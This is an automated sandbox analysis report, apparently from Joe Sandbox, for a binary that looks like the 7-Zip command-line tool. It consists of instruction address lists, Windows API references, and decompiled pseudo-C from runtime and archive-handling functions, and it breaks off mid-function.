                                                                      0x00442688
                                                                      0x0044268d
                                                                      0x00442690
                                                                      0x00442694
                                                                      0x00442696
                                                                      0x0044269b
                                                                      0x0044269b
                                                                      0x0044269e
                                                                      0x004426a8
                                                                      0x004426ac
                                                                      0x004426b4
                                                                      0x004426b8
                                                                      0x004426bd
                                                                      0x00000000
                                                                      0x004426bd
                                                                      0x004420e4
                                                                      0x004420e6
                                                                      0x00442236
                                                                      0x00442236
                                                                      0x0044223a
                                                                      0x00000000
                                                                      0x0044223a
                                                                      0x004420ec
                                                                      0x004420ec
                                                                      0x004420f5
                                                                      0x004420f9
                                                                      0x004420fc
                                                                      0x00442102
                                                                      0x00442105
                                                                      0x00442109
                                                                      0x00442113
                                                                      0x00442116
                                                                      0x00442119
                                                                      0x0044211c
                                                                      0x00442186
                                                                      0x00442189
                                                                      0x0044218b
                                                                      0x0044277b
                                                                      0x00442781
                                                                      0x00442784
                                                                      0x00442788
                                                                      0x0044278a
                                                                      0x0044278f
                                                                      0x0044278f
                                                                      0x00442798
                                                                      0x0044279c
                                                                      0x004427a4
                                                                      0x004427a8
                                                                      0x004427b3
                                                                      0x004427b7
                                                                      0x004427c2
                                                                      0x004427c6
                                                                      0x004427d1
                                                                      0x004427d5
                                                                      0x004427e0
                                                                      0x004427e4
                                                                      0x004427ef
                                                                      0x004427f3
                                                                      0x004427f8
                                                                      0x004427fb
                                                                      0x004427ff
                                                                      0x00442801
                                                                      0x00442806
                                                                      0x00442806
                                                                      0x00442809
                                                                      0x00442810
                                                                      0x00442761
                                                                      0x00442764
                                                                      0x0044276c
                                                                      0x00442770
                                                                      0x00000000
                                                                      0x00442770
                                                                      0x00442191
                                                                      0x0044219b
                                                                      0x0044219d
                                                                      0x0044219f
                                                                      0x0044281a
                                                                      0x00442820
                                                                      0x00442823
                                                                      0x00442827
                                                                      0x00442829
                                                                      0x0044282e
                                                                      0x0044282e
                                                                      0x00442837
                                                                      0x0044283b
                                                                      0x00442843
                                                                      0x00442847
                                                                      0x00442852
                                                                      0x00442856
                                                                      0x00442861
                                                                      0x00442865
                                                                      0x00442870
                                                                      0x00442874
                                                                      0x0044287f
                                                                      0x00442883
                                                                      0x0044288e
                                                                      0x00442892
                                                                      0x00442897
                                                                      0x0044289a
                                                                      0x0044289e
                                                                      0x004428a0
                                                                      0x004428a9
                                                                      0x004428a9
                                                                      0x00000000
                                                                      0x004428a0
                                                                      0x004421a6
                                                                      0x004421aa
                                                                      0x004421b0
                                                                      0x004421b2
                                                                      0x004421b5
                                                                      0x0044222a
                                                                      0x0044222d
                                                                      0x00442231
                                                                      0x00000000
                                                                      0x00442231
                                                                      0x004421b7
                                                                      0x004421bd
                                                                      0x004421bd
                                                                      0x004421bf
                                                                      0x004421c5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004421c7
                                                                      0x004421c8
                                                                      0x004421cb
                                                                      0x004421ce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004421d0
                                                                      0x004421d2
                                                                      0x004421db
                                                                      0x004421de
                                                                      0x004421e6
                                                                      0x004421ee
                                                                      0x004421fc
                                                                      0x00442201
                                                                      0x00442204
                                                                      0x0044220f
                                                                      0x0044220f
                                                                      0x00442216
                                                                      0x0044221c
                                                                      0x00442225
                                                                      0x00000000
                                                                      0x00442225
                                                                      0x00442127
                                                                      0x00442129
                                                                      0x0044212f
                                                                      0x0044213b
                                                                      0x00442140
                                                                      0x0044214a
                                                                      0x0044214c
                                                                      0x0044214e
                                                                      0x004426c8
                                                                      0x004426ce
                                                                      0x004426d1
                                                                      0x004426d5
                                                                      0x004426d7
                                                                      0x004426dc
                                                                      0x004426dc
                                                                      0x004426e5
                                                                      0x004426e9
                                                                      0x004426f1
                                                                      0x004426f5
                                                                      0x00442700
                                                                      0x00442704
                                                                      0x0044270f
                                                                      0x00442713
                                                                      0x0044271e
                                                                      0x00442722
                                                                      0x0044272d
                                                                      0x00442731
                                                                      0x0044273c
                                                                      0x00442740
                                                                      0x00442745
                                                                      0x00442748
                                                                      0x0044274c
                                                                      0x0044274e
                                                                      0x00442753
                                                                      0x00442753
                                                                      0x00442756
                                                                      0x0044275d
                                                                      0x00000000
                                                                      0x0044275d
                                                                      0x00442162
                                                                      0x00442166
                                                                      0x0044216c
                                                                      0x0044216f
                                                                      0x00442173
                                                                      0x00442175
                                                                      0x0044217e
                                                                      0x0044217e
                                                                      0x00000000
                                                                      0x00442175
                                                                      0x00441eec
                                                                      0x00441eef
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00442569
                                                                      0x0044256c
                                                                      0x0044256f
                                                                      0x0044256f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441dcd
                                                                      0x00441dcd
                                                                      0x00441dd3
                                                                      0x00441dd8
                                                                      0x00441ddd
                                                                      0x00441ddf
                                                                      0x00441de2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441de8
                                                                      0x00441dea
                                                                      0x00441df0
                                                                      0x00441df3
                                                                      0x00441df5
                                                                      0x00441df9
                                                                      0x00441e0b
                                                                      0x00441e0b
                                                                      0x00441dfb
                                                                      0x00441e04
                                                                      0x00441e04
                                                                      0x00441e0f
                                                                      0x00441e13
                                                                      0x00441e16
                                                                      0x00441e1b
                                                                      0x00441e1d
                                                                      0x00441e20
                                                                      0x00441f8c
                                                                      0x00441f90
                                                                      0x00441f9b
                                                                      0x00441f9f
                                                                      0x00441faa
                                                                      0x00441fae
                                                                      0x00441fb9
                                                                      0x00441fbd
                                                                      0x00441fc8
                                                                      0x00441fcc
                                                                      0x00441fd7
                                                                      0x00441fdb
                                                                      0x00441fe0
                                                                      0x00441fe3
                                                                      0x00441fe7
                                                                      0x00441fe9
                                                                      0x00441fee
                                                                      0x00441fee
                                                                      0x00441ff1
                                                                      0x00441ffb
                                                                      0x00441fff
                                                                      0x00442007
                                                                      0x0044200b
                                                                      0x00442010
                                                                      0x00000000
                                                                      0x00441e26
                                                                      0x00441e2c
                                                                      0x00441e31
                                                                      0x00441e38
                                                                      0x00441e3a
                                                                      0x00441e3f
                                                                      0x00441e42
                                                                      0x00441e4f
                                                                      0x00441e4f
                                                                      0x00441e44
                                                                      0x00441e44
                                                                      0x00441e47
                                                                      0x00441e47
                                                                      0x00441e55
                                                                      0x00441e58
                                                                      0x00441e5d
                                                                      0x00441e67
                                                                      0x00441e6c
                                                                      0x00441e71
                                                                      0x00441e79
                                                                      0x00441e7b
                                                                      0x00441e7d
                                                                      0x0044201b
                                                                      0x0044201f
                                                                      0x0044202a
                                                                      0x0044202e
                                                                      0x00442039
                                                                      0x0044203d
                                                                      0x00442048
                                                                      0x0044204c
                                                                      0x00442057
                                                                      0x0044205b
                                                                      0x00442066
                                                                      0x0044206a
                                                                      0x0044206f
                                                                      0x00442072
                                                                      0x00442076
                                                                      0x00442078
                                                                      0x0044207d
                                                                      0x0044207d
                                                                      0x00442080
                                                                      0x00442087
                                                                      0x00000000
                                                                      0x00441e83
                                                                      0x00441e83
                                                                      0x00441e84
                                                                      0x00441e87
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441e87
                                                                      0x00441e7d
                                                                      0x00441e20
                                                                      0x00441efd
                                                                      0x00441f01
                                                                      0x00441f0c
                                                                      0x00441f10
                                                                      0x00441f1b
                                                                      0x00441f1f
                                                                      0x00441f2a
                                                                      0x00441f2e
                                                                      0x00441f39
                                                                      0x00441f3d
                                                                      0x00441f48
                                                                      0x00441f4c
                                                                      0x00441f51
                                                                      0x00441f54
                                                                      0x00441f58
                                                                      0x00441f5a
                                                                      0x00441f5f
                                                                      0x00441f5f
                                                                      0x00441f62
                                                                      0x00441f6c
                                                                      0x00441f70
                                                                      0x00441f78
                                                                      0x00441f7c
                                                                      0x00441f81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441d8e
                                                                      0x00441d8e
                                                                      0x00441d9a
                                                                      0x00441da0
                                                                      0x00441da7
                                                                      0x00441dab
                                                                      0x00441db6
                                                                      0x00441dba
                                                                      0x00441dbf
                                                                      0x00441dbf
                                                                      0x00441dbf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441d45
                                                                      0x00441d45
                                                                      0x00441d4b
                                                                      0x00441d50
                                                                      0x00441d56
                                                                      0x00441d68
                                                                      0x00441d69
                                                                      0x00441d6d
                                                                      0x00441d78
                                                                      0x00441d7c
                                                                      0x00441d81
                                                                      0x00441d82
                                                                      0x00441d82
                                                                      0x00000000
                                                                      0x00441cb1
                                                                      0x00441cb4
                                                                      0x00441cb8
                                                                      0x00441cc3
                                                                      0x00441cc7
                                                                      0x00441cd2
                                                                      0x00441cd6
                                                                      0x00441ce1
                                                                      0x00441ce5
                                                                      0x00441cf0
                                                                      0x00441cf4
                                                                      0x00441cff
                                                                      0x00441d03
                                                                      0x00441d08
                                                                      0x00441d0b
                                                                      0x00441d0f
                                                                      0x00441d11
                                                                      0x00441d16
                                                                      0x00441d16
                                                                      0x00441d19
                                                                      0x00441d1c
                                                                      0x00441d20
                                                                      0x00441d23
                                                                      0x00441d2b
                                                                      0x00441d2f
                                                                      0x00441d34
                                                                      0x004425f6
                                                                      0x004425fc
                                                                      0x00442600
                                                                      0x00442605
                                                                      0x0044260f
                                                                      0x00442614
                                                                      0x00442616
                                                                      0x0044261c
                                                                      0x00442624
                                                                      0x00442624
                                                                      0x00441cab
                                                                      0x00000000
                                                                      0x00441b7f
                                                                      0x00441af2
                                                                      0x00441af7
                                                                      0x00441afc
                                                                      0x00441afe
                                                                      0x00441afe
                                                                      0x00441b04
                                                                      0x00441b09
                                                                      0x00441b0d
                                                                      0x00441b0e
                                                                      0x00441b3e
                                                                      0x00441b16
                                                                      0x00441b18
                                                                      0x00441b1a
                                                                      0x00441b1d
                                                                      0x00441b1f
                                                                      0x00441b1f
                                                                      0x00441b1d
                                                                      0x00441b3f
                                                                      0x00441b44
                                                                      0x00441b44
                                                                      0x00441b46
                                                                      0x00441b4e
                                                                      0x00441b51
                                                                      0x00000000
                                                                      0x00441b53
                                                                      0x00441b53
                                                                      0x00000000
                                                                      0x00441b53
                                                                      0x00441b51
                                                                      0x00441ad9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441adf
                                                                      0x00000000
                                                                      0x00441adf
                                                                      0x00441ac4
                                                                      0x00441aa1
                                                                      0x00441aa9
                                                                      0x00441aad
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00441962
                                                                      0x00441962
                                                                      0x00441965
                                                                      0x0044196a
                                                                      0x00441999
                                                                      0x004419a2
                                                                      0x004419a3
                                                                      0x004419ae
                                                                      0x004419bb
                                                                      0x004419cb
                                                                      0x004419cc
                                                                      0x004419d4
                                                                      0x004419d6
                                                                      0x00441b23
                                                                      0x00441b2d
                                                                      0x00441b32
                                                                      0x00000000
                                                                      0x004419dc
                                                                      0x004419eb
                                                                      0x004419fe
                                                                      0x00441a06
                                                                      0x00441a0c
                                                                      0x00441a0f
                                                                      0x00441a12
                                                                      0x00441a12
                                                                      0x00441a12
                                                                      0x00441a1c
                                                                      0x00000000
                                                                      0x00441a1c
                                                                      0x0044196c
                                                                      0x0044196f
                                                                      0x00441972
                                                                      0x00441975
                                                                      0x0044197b
                                                                      0x00441981
                                                                      0x00441984
                                                                      0x00441988
                                                                      0x00441988
                                                                      0x00441a21
                                                                      0x00441a21
                                                                      0x00441a25
                                                                      0x00441a28
                                                                      0x00441a2b
                                                                      0x00441a2c
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0044192A
                                                                      • __aulldiv.LIBCMT ref: 00441AF2
                                                                      • __aulldiv.LIBCMT ref: 00441B04
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 004426C8
                                                                        • Part of subcall function 00443BAF: __EH_prolog.LIBCMT ref: 00443BB4
                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,00000004,00000004,00010000,?,00000001), ref: 004420FC
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00442166
                                                                      • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,00000004,00000004,00010000,?,00000001), ref: 0044241C
                                                                        • Part of subcall function 00440F0D: __EH_prolog.LIBCMT ref: 00440F12
                                                                        • Part of subcall function 00467B10: SetEvent.KERNEL32(00000000,00410FDF), ref: 00467B13
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 004421AA
                                                                        • Part of subcall function 00441083: EnterCriticalSection.KERNEL32(?,00000000,?,00442557,0000001A,?,?,?,?,00000004,00000004,00010000,?,00000001), ref: 0044108B
                                                                        • Part of subcall function 00441083: LeaveCriticalSection.KERNEL32(?), ref: 004410AE
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044277B
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044281A
                                                                        • Part of subcall function 00442DE5: __EH_prolog.LIBCMT ref: 00442DEA
                                                                        • Part of subcall function 00442E79: __EH_prolog.LIBCMT ref: 00442E7E
                                                                        • Part of subcall function 0044296D: __EH_prolog.LIBCMT ref: 00442972
                                                                        • Part of subcall function 0044296D: DeleteCriticalSection.KERNEL32(?,?,?,004425CF,00000004,00000004,00010000,?,00000001), ref: 00442996
                                                                        • Part of subcall function 0044395A: __EH_prolog.LIBCMT ref: 0044395F
                                                                        • Part of subcall function 0044395A: DeleteCriticalSection.KERNEL32(?,?,?,004425DE,00000004,00000004,00010000,?,00000001), ref: 00443976
                                                                        • Part of subcall function 0043F571: __EH_prolog.LIBCMT ref: 0043F576
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$H_prolog$Leave$DeleteEnter__aulldiv$EventMultipleObjectsWait
                                                                      • String ID: D
                                                                      • API String ID: 1344393993-2746444292
                                                                      • Opcode ID: ebf051fc97326ff15014fddf33e1ce4ac637c8adec1716bc8864d6dceb0aae89
                                                                      • Instruction ID: b7ea9ee86155e0a7c7e569c876f0c1e31397adaa9b36ed63c9e7592aed198d63
                                                                      • Opcode Fuzzy Hash: ebf051fc97326ff15014fddf33e1ce4ac637c8adec1716bc8864d6dceb0aae89
                                                                      • Instruction Fuzzy Hash: A7B27030D00288DFEB15EFA4C994BDDBBB0AF19308F54809EE54967292DB785E49CF19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00471C24 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 46%
                                                                      			E00471C24(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x493850 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x493854; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x493858; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x493850(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x493850 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x493854 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x493858 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









                                                                      0x00471c25
                                                                      0x00471c27
                                                                      0x00471c2f
                                                                      0x00471c73
                                                                      0x00471c73
                                                                      0x00471c7a
                                                                      0x00471c7e
                                                                      0x00471c82
                                                                      0x00471c84
                                                                      0x00471c8b
                                                                      0x00471c90
                                                                      0x00471c90
                                                                      0x00471c8b
                                                                      0x00471c82
                                                                      0x00000000
                                                                      0x00471c9f
                                                                      0x00471c3c
                                                                      0x00471c40
                                                                      0x00471ca9
                                                                      0x00000000
                                                                      0x00471ca9
                                                                      0x00471c4e
                                                                      0x00471c52
                                                                      0x00471c57
                                                                      0x00000000
                                                                      0x00471c59
                                                                      0x00471c67
                                                                      0x00471c6e
                                                                      0x00000000
                                                                      0x00471c6e

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00470D65,?,Microsoft Visual C++ Runtime Library,00012010,?,0047CC5C,?,0048A174,?,?,?,Runtime Error!Program: ), ref: 00471C36
                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00471C4E
                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00471C5F
                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00471C6C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$LibraryLoad
                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                      • API String ID: 2238633743-4044615076
                                                                      • Opcode ID: c93d45f6ab12ccfc8be7b15ae8812bf4fd7e40829fe0effbe83a31a9d7762021
                                                                      • Instruction ID: ea4433a42688f02017ac68f8dd25db1f7bd77ae58eff3a6fbc345d1a27d7865b
                                                                      • Opcode Fuzzy Hash: c93d45f6ab12ccfc8be7b15ae8812bf4fd7e40829fe0effbe83a31a9d7762021
                                                                      • Instruction Fuzzy Hash: F1018471740311AF8722EFF99CC49AB7BE8EBA6741314847FB10DD2230DB7889418B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004311FE Relevance: 8.7, APIs: 3, Strings: 1, Instructions: 1676COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 81%
                                                                      			E004311FE(intOrPtr __ecx, void* __edx) {
				signed int _t1032;
				signed int _t1034;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				intOrPtr* _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1058;
				signed int* _t1059;
				signed int _t1062;
				signed int _t1076;
				signed int* _t1092;
				signed int _t1093;
				signed int _t1113;
				signed int _t1114;
				signed int _t1125;
				signed int _t1127;
				intOrPtr _t1141;
				intOrPtr _t1144;
				signed int _t1149;
				signed int _t1153;
				intOrPtr _t1158;
				signed int _t1165;
				signed int _t1179;
				signed int _t1181;
				signed int _t1188;
				intOrPtr _t1193;
				signed int _t1197;
				signed int _t1206;
				void* _t1207;
				signed int _t1212;
				signed int _t1213;
				signed int _t1217;
				signed int _t1232;
				signed int _t1235;
				signed int _t1237;
				signed int _t1238;
				signed int _t1249;
				signed int* _t1254;
				signed int _t1255;
				signed int _t1268;
				signed int _t1271;
				signed int _t1272;
				signed int _t1286;
				signed int _t1287;
				signed int _t1298;
				intOrPtr _t1301;
				signed int _t1305;
				signed int _t1306;
				signed int _t1312;
				signed int _t1321;
				signed int _t1322;
				signed int _t1340;
				signed int _t1343;
				intOrPtr _t1344;
				intOrPtr _t1345;
				signed int _t1347;
				signed int _t1350;
				signed int _t1363;
				intOrPtr _t1364;
				signed int _t1367;
				signed int _t1371;
				signed int _t1372;
				intOrPtr _t1391;
				signed int _t1392;
				signed int _t1393;
				intOrPtr _t1409;
				signed int _t1414;
				signed int _t1415;
				signed int _t1417;
				void* _t1420;
				intOrPtr _t1428;
				signed int _t1429;
				signed int _t1431;
				signed int _t1434;
				intOrPtr _t1436;
				intOrPtr _t1438;
				signed int _t1441;
				void* _t1445;
				intOrPtr _t1448;
				intOrPtr _t1459;
				intOrPtr _t1543;
				intOrPtr _t1547;
				signed int _t1548;
				signed int _t1555;
				signed int _t1573;
				signed int* _t1577;
				signed int _t1589;
				intOrPtr _t1601;
				intOrPtr _t1627;
				intOrPtr _t1651;
				intOrPtr _t1657;
				signed int _t1667;
				intOrPtr* _t1694;
				signed int _t1701;
				signed int _t1706;
				signed int _t1708;
				intOrPtr* _t1709;
				signed int _t1715;
				signed int _t1719;
				signed int _t1724;
				signed int _t1728;
				intOrPtr _t1729;
				signed int _t1730;
				intOrPtr _t1733;
				intOrPtr _t1738;
				signed int* _t1740;
				intOrPtr* _t1742;
				signed int _t1745;
				signed int _t1746;
				void* _t1751;
				intOrPtr _t1757;
				intOrPtr* _t1758;
				signed int _t1759;
				intOrPtr _t1760;
				signed int _t1763;
				intOrPtr _t1764;
				signed int _t1765;
				intOrPtr* _t1767;
				signed int _t1768;
				signed int _t1769;
				signed int _t1771;
				signed int _t1774;
				signed int _t1775;
				signed int _t1776;
				intOrPtr* _t1777;
				intOrPtr _t1779;
				signed int _t1780;
				intOrPtr* _t1782;
				void* _t1785;
				void* _t1787;
				void* _t1788;
				void* _t1790;
				void* _t1824;
				void* _t1826;

				E0046B890(E00477A16, _t1785);
				_t1788 = _t1787 - 0x4c0;
				 *((intOrPtr*)(_t1785 - 0x98)) = __ecx;
				_t1448 =  *((intOrPtr*)(_t1785 + 0x1c));
				_t1445 = __edx;
				_t1032 =  *(_t1448 + 0x10);
				_t1728 =  *(_t1448 + 0x14);
				 *(_t1785 - 0x70) = _t1032;
				 *(_t1785 - 0x6c) = _t1728;
				_t1745 = 0;
				if((_t1032 | _t1728) == 0) {
					 *(_t1785 - 0x70) = 1;
					 *(_t1785 - 0x6c) = _t1745;
				}
				if(_t1445 == _t1745) {
					_t1729 = 0;
					_t1034 = 0;
					__eflags = 0;
				} else {
					_t1729 =  *((intOrPtr*)(_t1445 + 0x138));
					_t1034 =  *((intOrPtr*)(_t1445 + 0x13c));
				}
				if(_t1034 > _t1745 || _t1729 > _t1745) {
					if( *((char*)(_t1448 + 0x21)) != 0) {
						goto L9;
					}
					_push(_t1745);
					_push(_t1034);
					_push(_t1729);
					_push(_t1745);
					_push(_t1745);
					_t1076 = E00432A5E( *((intOrPtr*)(_t1785 - 0x98)),  *(_t1785 + 0x14));
					if(_t1076 != _t1745) {
						goto L286;
					}
					goto L9;
				} else {
					L9:
					E00404AD0(_t1785 - 0xd4, 4);
					 *((intOrPtr*)(_t1785 - 0xd4)) = 0x47a668;
					 *(_t1785 - 4) = _t1745;
					E00404AD0(_t1785 - 0xb4, 0xc);
					 *((intOrPtr*)(_t1785 - 0xb4)) = 0x47b41c;
					 *(_t1785 - 0x26) =  *(_t1785 - 0x26) & 0x00000000;
					_t1757 =  *((intOrPtr*)(_t1785 + 8));
					 *(_t1785 - 4) = 1;
					 *(_t1785 - 0x54) = _t1745;
					 *(_t1785 - 0x50) = _t1745;
					 *(_t1785 - 0x78) = _t1745;
					 *(_t1785 - 0x74) = _t1745;
					if(_t1445 == _t1745) {
						L43:
						_t1730 =  *(_t1757 + 8);
						 *(_t1785 - 0x34) = _t1745;
						 *(_t1785 - 0x30) = _t1745;
						 *(_t1785 - 0x10) = _t1745;
						if(_t1730 <= _t1745) {
							L55:
							_t1037 =  *(_t1785 - 0x74);
							_t1824 = _t1037 -  *(_t1785 - 0x30);
							if(_t1824 >= 0 && (_t1824 > 0 ||  *(_t1785 - 0x78) >  *(_t1785 - 0x34))) {
								 *(_t1785 - 0x30) = _t1037;
								 *(_t1785 - 0x34) =  *(_t1785 - 0x78);
							}
							_t1826 =  *(_t1785 - 0x30) - _t1745;
							if(_t1826 <= 0 && (_t1826 < 0 ||  *(_t1785 - 0x34) < 0x10000)) {
								 *(_t1785 - 0x34) = 0x10000;
								 *(_t1785 - 0x30) = _t1745;
							}
							_t1758 =  *((intOrPtr*)(_t1785 + 0x18));
							_t1040 =  *((intOrPtr*)( *_t1758 + 0xc))(_t1758,  *(_t1785 - 0x54),  *(_t1785 - 0x50));
							if(_t1040 == _t1745) {
								_push(0x38);
								_t1041 = E004079F2();
								 *(_t1785 - 0x68) = _t1041;
								__eflags = _t1041 - _t1745;
								 *(_t1785 - 4) = 2;
								if(_t1041 == _t1745) {
									_t1746 = 0;
									__eflags = 0;
								} else {
									_t1746 = E0040F3E5(_t1041);
								}
								__eflags = _t1746;
								 *(_t1785 - 0x68) = _t1746;
								 *(_t1785 - 4) = 1;
								 *(_t1785 - 0x74) = _t1746;
								if(_t1746 != 0) {
									 *((intOrPtr*)( *_t1746 + 4))(_t1746);
								}
								_push(1);
								 *(_t1785 - 4) = 3;
								E0040F478(_t1746, _t1758);
								E0043333A(_t1785 - 0x2cc, __eflags);
								__eflags =  *(_t1785 - 0xac);
								 *(_t1785 - 4) = 4;
								if( *(_t1785 - 0xac) == 0) {
									L72:
									E00405B9F(_t1785 - 0x4c);
									 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
									 *(_t1785 - 4) = 5;
									_t1759 = 4;
									do {
										E004335AA(_t1785 - 0xe8);
										_push(_t1785 - 0xe8);
										 *(_t1785 - 4) = 6;
										E004336E2(_t1785 - 0x4c);
										 *(_t1785 - 4) = 5;
										E00408604(_t1785 - 0xe8);
										_t1759 = _t1759 - 1;
										__eflags = _t1759;
									} while (_t1759 != 0);
									_t1049 =  *((intOrPtr*)(_t1785 + 0x1c));
									_t1760 =  *_t1049;
									 *(_t1785 - 0x11) =  *((intOrPtr*)(_t1049 + 8));
									__eflags =  *((intOrPtr*)(_t1760 + 8)) - 1;
									if( *((intOrPtr*)(_t1760 + 8)) != 1) {
										L76:
										_t175 = _t1785 - 0x11;
										 *_t175 =  *(_t1785 - 0x11) & 0x00000000;
										__eflags =  *_t175;
										L77:
										_t1459 =  *((intOrPtr*)(_t1785 + 8));
										 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
										__eflags =  *(_t1459 + 8);
										if( *(_t1459 + 8) <= 0) {
											L94:
											 *(_t1785 - 0xa0) =  *(_t1785 - 0xa0) & 0x00000000;
											__eflags =  *(_t1785 - 0x26);
											if(__eflags == 0) {
												L109:
												_push(0);
												_t1050 = E0042F495( *((intOrPtr*)(_t1785 + 0xc)), __eflags,  *(_t1785 + 0x14));
												__eflags = _t1050;
												 *(_t1785 + 0x14) = _t1050;
												if(_t1050 == 0) {
													_t1051 = E0042F522( *((intOrPtr*)(_t1785 + 0xc)));
													__eflags = _t1051;
													 *(_t1785 + 0x14) = _t1051;
													if(_t1051 == 0) {
														 *((intOrPtr*)(_t1746 + 0x18)) = 0;
														 *(_t1785 - 0x24) = 0;
														 *((intOrPtr*)(_t1746 + 0x1c)) = 0;
														 *(_t1785 - 0x2c) = 0;
														do {
															_t1762 =  *(_t1785 - 0x2c);
															 *((intOrPtr*)(_t1785 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x40)) +  *(_t1785 - 0x2c) * 4));
															E00428499(_t1785 - 0x1b4);
															 *(_t1785 - 4) = 0xe;
															__eflags = E0043351E( *(_t1785 - 0x2c));
															if(__eflags == 0) {
																E00428562(_t1785 - 0x1b4,  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)))));
															} else {
																_push(_t1785 - 0x1b4);
																_t1730 =  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)) + 9));
																E00433001( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)))), _t1730, __eflags);
															}
															_t1058 = E00433524(_t1762);
															__eflags = _t1058;
															if(_t1058 == 0) {
																_t1059 =  *(_t1785 - 0x184);
																 *(_t1785 - 0x188) =  *(_t1785 - 0x188) & 0x00000000;
